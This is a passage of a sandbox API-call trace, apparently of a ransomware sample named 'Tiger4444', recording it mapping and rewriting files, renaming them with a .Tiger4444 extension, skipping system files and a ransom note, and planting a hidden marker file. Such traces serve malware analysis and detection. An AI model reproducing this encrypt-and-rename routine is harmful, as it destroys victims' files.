dwNumberOfBytesToMap=0x1f030) returned 0xbe0000 [0044.336] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.336] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.336] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.336] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.336] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13578931121) returned 1 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0044.336] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0044.336] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.338] CloseHandle (hObject=0x2c8) returned 1 [0044.338] CloseHandle (hObject=0x260) returned 1 [0044.341] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.Tiger4444") returned 62 [0044.341] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-cn.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-cn.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.341] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=126256 | out: Addend=0xc6f980) returned 14606432 [0044.341] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=16 | out: Addend=0xc6f98c) returned 4200 [0044.341] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-hk.htm", cAlternateFileName="EULA_Z~2.HTM")) returned 1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="Tiger4444.exe") returned -1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2=".") returned 1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="..") returned 1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="windows") returned -1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="bootmgr") returned 1 [0044.341] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="pagefile.sys") returned -1 [0044.342] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="boot") returned 1 [0044.342] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="ids.txt") returned -1 [0044.342] lstrcmpiW (lpString1="EULA_zh-hk.htm", lpString2="NTUSER.DAT") returned -1 [0044.342] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_zh-hk.htm" | out: lpString1="EULA_zh-hk.htm") returned="EULA_zh-hk.htm" [0044.342] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm", dwFileAttributes=0x0) returned 1 [0044.342] lstrlenW (lpString="EULA_zh-hk.htm") returned 14 [0044.342] lstrlenW (lpString="Tiger4444") returned 9 [0044.342] lstrcmpiW (lpString1="zh-hk.htm", lpString2="Tiger4444") returned 1 [0044.342] lstrlenW (lpString=".dll") returned 4 [0044.342] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.342] lstrlenW (lpString=".lnk") returned 4 [0044.342] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.342] lstrlenW (lpString=".ini") returned 4 [0044.342] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.342] lstrlenW (lpString=".sys") returned 4 [0044.342] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.342] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.342] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.342] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13579545955) returned 1 [0044.342] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=147140) returned 1 [0044.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0044.342] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0044.343] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x241d0, lpName=0x0) returned 0x2c8 [0044.344] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x241d0) returned 0xbe0000 [0044.355] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.355] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0044.355] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.355] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.355] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0044.356] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13580878823) returned 1 [0044.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0044.356] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72038 | out: hHeap=0xc50000) returned 1 [0044.356] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.357] CloseHandle (hObject=0x2c8) returned 1 [0044.357] CloseHandle (hObject=0x260) returned 1 [0044.361] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.Tiger4444") returned 62 [0044.361] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-hk.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-hk.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.362] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=147152 | out: Addend=0xc6f980) returned 14732688 [0044.362] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=13 | out: Addend=0xc6f98c) returned 4216 [0044.362] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-tw.htm", cAlternateFileName="EULA_Z~3.HTM")) returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="Tiger4444.exe") returned -1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2=".") returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="..") returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="windows") returned -1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="bootmgr") returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="pagefile.sys") returned -1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="boot") returned 1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="ids.txt") returned -1 [0044.362] lstrcmpiW (lpString1="EULA_zh-tw.htm", lpString2="NTUSER.DAT") returned -1 [0044.362] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_zh-tw.htm" | out: lpString1="EULA_zh-tw.htm") returned="EULA_zh-tw.htm" [0044.362] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm", dwFileAttributes=0x0) returned 1 [0044.362] lstrlenW (lpString="EULA_zh-tw.htm") returned 14 [0044.362] lstrlenW (lpString="Tiger4444") returned 9 [0044.362] lstrcmpiW (lpString1="zh-tw.htm", lpString2="Tiger4444") returned 1 [0044.362] lstrlenW (lpString=".dll") returned 4 [0044.363] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.363] lstrlenW (lpString=".lnk") returned 4 [0044.363] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.363] lstrlenW (lpString=".ini") returned 4 [0044.363] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.363] lstrlenW (lpString=".sys") returned 4 [0044.363] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.363] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.363] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.363] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13581595115) returned 1 [0044.363] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=147140) returned 1 [0044.363] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0044.363] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0044.363] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x241d0, lpName=0x0) returned 0x2c8 [0044.364] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x241d0) returned 0xbe0000 [0044.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0044.437] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0044.437] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.437] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0044.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0044.438] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13589069625) returned 1 [0044.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0044.438] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0044.438] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.439] CloseHandle (hObject=0x2c8) returned 1 [0044.439] CloseHandle (hObject=0x260) returned 1 [0044.443] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.Tiger4444") returned 62 [0044.443] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_zh-tw.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_zh-tw.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.443] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=147152 | out: Addend=0xc6f980) returned 14879840 [0044.443] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=74 | out: Addend=0xc6f98c) returned 4229 [0044.443] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x23ec4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_zh-tw.htm", cAlternateFileName="EULA_Z~3.HTM")) returned 0 [0044.444] FindClose (in: hFindFile=0xc72d08 | out: hFindFile=0xc72d08) returned 1 [0044.444] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0044.444] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0044.445] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0044.445] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0044.446] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.446] CloseHandle (hObject=0x260) returned 1 [0044.446] CloseHandle (hObject=0x2ac) returned 1 [0044.447] GetCurrentThreadId () returned 0xfa8 [0044.447] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66548 [0044.447] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\amd64", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64") returned="C:\\Windows10Upgrade\\resources\\amd64" [0044.447] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b2d8 | out: hHeap=0xc50000) returned 1 [0044.447] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66540 | out: hHeap=0xc50000) returned 1 [0044.447] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\amd64" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64") returned="C:\\Windows10Upgrade\\resources\\amd64" [0044.447] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\amd64", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\") returned="C:\\Windows10Upgrade\\resources\\amd64\\" [0044.447] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3" [0044.447] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\amd64\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0044.450] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0044.521] FlushFileBuffers (hFile=0x2ac) returned 1 [0044.561] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0044.562] CloseHandle (hObject=0x2ac) returned 1 [0044.562] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\amd64") returned 35 [0044.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0044.562] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7f82c7f7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7f82c7f7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0044.563] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.563] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.563] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0044.563] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0044.563] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea398e53, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x7f82c7f7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7f82c7f7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.563] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.563] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0044.563] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0044.563] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0044.563] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0044.563] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7f82c7f7, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7f82c7f7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7f8eb595, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0044.563] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.563] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0044.563] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea39b5b0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea39b5b0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x16ebc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BiosBlocks.xml", cAlternateFileName="BIOSBL~1.XML")) returned 1 [0044.563] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.563] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.563] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="Tiger4444.exe") returned -1 [0044.563] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2=".") returned 1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="..") returned 1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="windows") returned -1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="bootmgr") returned -1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="pagefile.sys") returned -1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="boot") returned -1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="ids.txt") returned -1 [0044.564] lstrcmpiW (lpString1="BiosBlocks.xml", lpString2="NTUSER.DAT") returned -1 [0044.564] lstrcpyW (in: lpString1=0x30aeaf0, lpString2="BiosBlocks.xml" | out: lpString1="BiosBlocks.xml") returned="BiosBlocks.xml" [0044.564] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml", dwFileAttributes=0x0) returned 1 [0044.567] lstrlenW (lpString="BiosBlocks.xml") returned 14 [0044.567] lstrlenW (lpString="Tiger4444") returned 9 [0044.567] lstrcmpiW (lpString1="locks.xml", lpString2="Tiger4444") returned -1 [0044.567] lstrlenW (lpString=".dll") returned 4 [0044.568] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0044.568] lstrlenW (lpString=".lnk") returned 4 [0044.568] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0044.568] lstrlenW (lpString=".ini") returned 4 [0044.568] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0044.568] lstrlenW (lpString=".sys") returned 4 [0044.568] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0044.568] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.568] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.568] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13602095995) returned 1 [0044.568] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=93884) returned 1 [0044.568] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0044.568] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0044.568] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x171c0, lpName=0x0) returned 0x2c8 [0044.569] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x171c0) returned 0xbe0000 [0044.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0044.574] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0044.574] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13602716711) returned 1 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0044.574] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0044.574] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.575] CloseHandle (hObject=0x2c8) returned 1 [0044.575] CloseHandle (hObject=0x260) returned 1 [0044.578] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.Tiger4444") returned 60 [0044.578] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml"), lpNewFileName="C:\\Windows10Upgrade\\resources\\amd64\\BiosBlocks.xml.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\amd64\\biosblocks.xml.tiger4444"), dwFlags=0x1) returned 1 [0044.578] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=93888 | out: Addend=0xc6f980) returned 15026992 [0044.578] InterlockedExchangeAdd 